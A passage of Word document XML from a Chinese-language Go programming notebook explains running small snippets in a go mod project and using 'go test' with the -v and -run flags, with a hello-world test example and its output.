      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc159779777"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何在已经写好的具有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中测试小段代码（非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gotest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>
    </w:p>
    <w:p w14:paraId="781F46B7" w14:textId="4E423600" w:rsidR="001C1437" w:rsidRDefault="001C1437" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1E70B8" w14:textId="7C6CEAE9" w:rsidR="00843464" w:rsidRDefault="00843464" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图，写个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，里面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797CF3E3" w14:textId="5D030B88" w:rsidR="00843464" w:rsidRDefault="00843464" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后直接配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置项就可以运行了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B08008" w14:textId="72795624" w:rsidR="004C452C" w:rsidRDefault="00843464" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783EE3BC" wp14:editId="21C393DA">
            <wp:extent cx="5274310" cy="2887980"/>
            <wp:effectExtent l="0" t="0" r="254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2887980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C9895" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc159779778"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>
    </w:p>
    <w:p w14:paraId="67D7E90B" w14:textId="716CB7F8" w:rsidR="002E14A3" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/sss4/p/12859027.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87B35E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的单元测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://c.biancheng.net/view/124.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FF8FBEE" w14:textId="3669D0CF" w:rsidR="004C452C" w:rsidRDefault="002E14A3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于测试用例怎么写的参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E14A3">
        <w:t>https://geektutu.com/post/quick-go-test.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A03FAC5" w14:textId="15B841E4" w:rsidR="002E14A3" w:rsidRDefault="002E14A3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C49800" w14:textId="77777777" w:rsidR="002E14A3" w:rsidRDefault="002E14A3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE5D10D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">go test </w:t>
      </w:r>
      <w:r>
        <w:t>命令，会自动读取源码目录下面名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> *_test.go </w:t>
      </w:r>
      <w:r>
        <w:t>的文件，生成并运行测试用的可执行文件。输出的信息类似下面所示的样子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44918F4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ok archive/tar 0.011s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3363ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FAIL archive/zip 0.022s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118D449B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ok compress/gzip 0.033s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DA90D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B4126" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>要开始一个单元测试，需要准备一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> go </w:t>
      </w:r>
      <w:r>
        <w:t>源码文件，在命名文件时需要让文件必须以</w:t>
      </w:r>
      <w:r>
        <w:t>_test</w:t>
      </w:r>
      <w:r>
        <w:t>结尾。默认的情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>go test</w:t>
      </w:r>
      <w:r>
        <w:t>命令不需要任何的参数，它会自动把你源码包下面所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> test </w:t>
      </w:r>
      <w:r>
        <w:t>文件测试完毕，当然你也可以带上参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F182A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EEB011" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E5477A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package code11_3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF40237" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import "testing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B05CB39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func TestHelloWorld(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>t *testing.T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58524257" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    t.Log("hello world")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7EE87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F16929A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4002E474" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定文件测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A030D0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="00D568E6" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D568E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go test helloworld_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7218C6E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D568E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go test -v helloworld_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B934636" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF96BBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA747F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>$ go test helloworld_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80B6CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>ok          command-line-arguments        0.003s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1E223" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>$ go test -v helloworld_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D48BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>=== RUN   TestHelloWorld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C1D0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>--- PASS: TestHelloWorld (0.00s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D363E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        helloworld_test.go:8: hello world</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB4E49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E70C0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>ok          command-line-arguments        0.004s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C63E25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码说明如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414AC8BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> go test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> helloworld_test.go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，表示测试这个文件里的所有测试用例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03D672" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行，显示测试结果，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示测试通过，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">command-line-arguments </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是测试用例需要用到的一个包名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0.003s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示测试花费的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746C0CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行，显示在附加参数中添加了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以让测试时显示详细的流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FA689" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行，表示开始运行名叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TestHelloWorld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的测试用例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084875F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行，表示已经运行完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TestHelloWorld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的测试用例，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示测试成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A2ACC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行打印字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hello world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63588988" w14:textId="240D994E" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>指定单元测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF0EFE" w14:textId="0130854E" w:rsidR="00DF6D0F" w:rsidRDefault="00DF6D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF6D0F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数指定要执行的测试用例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611E7D3" w14:textId="77777777" w:rsidR="00DF6D0F" w:rsidRPr="00DF6D0F" w:rsidRDefault="00DF6D0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A113CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TestA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8180CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>$ go test -v -run TestA select_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3736CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>=== RUN   TestA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543E39E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
